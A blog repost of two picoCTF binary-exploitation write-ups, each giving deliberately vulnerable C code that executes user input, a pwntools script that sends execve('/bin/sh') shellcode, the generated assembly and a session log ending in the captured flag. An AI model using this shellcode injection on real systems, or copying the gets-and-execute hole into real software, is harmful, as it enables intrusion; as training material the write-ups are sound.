shellcode的一个demo例子
一个 例子 Demo shellcode
2023-09-14 09:11:49 时间
handy-shellcode
Binary Exploitation, 50 points
Description:
This program executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
void vuln(char *buf){
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
char buf[BUFSIZE];
puts("Enter your shellcode:");
vuln(buf);
puts("Thanks! Executing now...");
((void (*)())buf)();
puts("Finishing Executing Shellcode. Exiting now...");
return 0;
}
Solution:
This challenge is similar to last year's shellcode. We'll use pwntools' "shellcode" module to generate a shellcode:
# First, generate a pwntools template using:
# pwn template --host 2019shell1.picoctf.com --user dvdalt --path /problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af/vuln
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX disabled
# PIE: No PIE (0x8048000)
# RWX: Has RWX segments
import os
if shell is not None:
shell.set_working_directory(os.path.dirname(remote_path))
io = start()
shellcode = shellcraft.sh()
log.info("Shellcode: \n{}".format(shellcode))
io.sendlineafter("Enter your shellcode:", asm(shellcode))
io.interactive()
Output:
root@kali:/media/sf_CTFs/pico/handy-shellcode# python exploit.py
[*] '/media/sf_CTFs/pico/handy-shellcode/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Connecting to 2019shell1.picoctf.com on port 22: Done
[*] dvdalt@2019shell1.picoctf.com:
Distro Ubuntu 18.04
OS: linux
Arch: amd64
Version: 4.15.0
ASLR: Enabled
[+] Opening new channel: 'pwd': Done
[+] Receiving all data: Done (13B)
[*] Closed SSH channel with 2019shell1.picoctf.com
[*] Working directory: '/tmp/tmp.AwgEXes6oj'
[+] Opening new channel: 'ln -s /home/dvdalt/* .': Done
[+] Receiving all data: Done (0B)
[*] Closed SSH channel with 2019shell1.picoctf.com
[*] Working directory: '/problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af'
[+] Starting remote process '/problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af/vuln' on 2019shell1.picoctf.com: pid 3301954
[*] Shellcode:
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
[*] Switching to interactive mode
jhh///sh/bin\x89h����\x814$ri��1Qj\x04Y�Q1j\x0bX̀
Thanks! Executing now...
$ $ ls
flag.txt vuln vuln.c
$ $ cat flag.txt
picoCTF{h4ndY_d4ndY_sh311c0d3_5843b402}
shellcode
Binary Exploitation, 200 points
Description:
This program executes any input you give it. Can you get a shell?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
void vuln(char *buf){
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
char buf[BUFSIZE];
puts("Enter a string!");
vuln(buf);
puts("Thanks! Executing now...");
((void (*)())buf)();
return 0;
}
Solution:
We'll use pwntools' "shellcode" module to generate a shellcode:
from pwn import *
import argparse
import os
EXECUTABLE = "vuln"
LOCAL_PATH = "./"
REMOTE_PATH = "/problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed/"
SSH_SERVER = "2018shell3.picoctf.com"
def get_process_path(is_ssh = False):
if is_ssh or os.path.exists(REMOTE_PATH):
return REMOTE_PATH + EXECUTABLE
else:
return LOCAL_PATH + EXECUTABLE
def get_process(ssh_user = None):
is_ssh = ssh_user is not None
path = get_process_path(is_ssh)
params = {"argv": path, "cwd": os.path.dirname(path)}
if is_ssh:
s = ssh(host=SSH_SERVER, user=ssh_user)
p = s.process(**params)
else:
p = process(**params)
return p
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--ssh_user", help="Connect via SSH with the given username")
args = parser.parse_args()
context.binary = get_process_path()
p = get_process(args.ssh_user)
shellcode = shellcraft.sh()
print "Shellcode:"
print shellcode
payload = asm(shellcode)
p.sendlineafter("Enter a string!", payload)
p.interactive()
Output:
root@kali:/media/sf_CTFs/pico/shellcode# python exploit.py --ssh_user=$pico_ssh_user
[*] '/media/sf_CTFs/pico/shellcode/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Connecting to 2018shell3.picoctf.com on port 22: Done
[*] user@2018shell3.picoctf.com:
Distro Ubuntu 16.04
OS: linux
Arch: amd64
Version: 4.4.0
ASLR: Enabled
[+] Starting remote process '/problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed/vuln' on 2018shell3.picoctf.com: pid 94685
Shellcode:
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
[*] Switching to interactive mode
jhh///sh/bin\x89h����\x814$ri��1Qj\x04Y�Q1j\x0bX̀
Thanks! Executing now...
$ $ ls
flag.txt vuln vuln.c
$ $ cat flag.txt
picoCTF{shellc0de_w00h00_9ee0edd0}$ $ exit
[*] Got EOF while reading in interactive
$
[*] Stopped remote process 'vuln' on 2018shell3.picoctf.com (pid 94685)
[*] Got EOF while sending in interactive
The flag: picoCTF{shellc0de_w00h00_9ee0edd0}
相关文章
- ruby利用Zip Gem写一个简单的压缩和解压的小工具
- 判断一个男人穷还是富,只看这几点!
- .NET(C#) Internals: 以一个数组填充的例子初步了解.NET 4.0中的并行(二)
- js基础知识:es6中,当对象中的key名称为一个变量时,需要用`[]`括起来
- 使用 SAP UI5 系统测试工具 UIVeri5 的一个具体例子
- SAP CRM One Order里Complex Set的一个例子:Partner Set
- 基于 SAP Spartacus 的 SAP 电商云 SEO 搜索引擎优化的一个例子
- 从一个实际的例子出发,谈谈SAP Commerce Cloud电商云的UI自定义开发
- 关于 Orbeon form PE 版本使用 JavaScript Embedding API 的一个例子
- scss百分号操作符的一个使用例子
- 使用jdbc连接本地postgreSQL的一个例子
- 通过一个具体的例子,讲解 SAP Cloud Platform Integration(CPI) 的使用方法
- 用一个实际例子理解Docker volume工作原理
- Angular bootstrap的一个例子
- uniapp的uni_modules目录需要提交到Git吗?为什么有了node_modules,还需要再发明一个uni_modules的轮子?node_modules和uni_modules的区别
- 手写一个c++的 Iterator
- 一个5.0/3.3V双向通讯的电路
- 永远不要将焦点设置到一个被禁用的控件上
- 内网渗透代理——reGeorg 利用 webshell 建立一个 socks 代理进行内网穿透,本质上就是在webshell上做了一个代理转发而已
- Spring JDBC 框架一个最简单的Hello World级别的例子
- HTML+CSS登陆界面实例:Instagram 登录页面(一个拿来就能用的炫酷登录页面)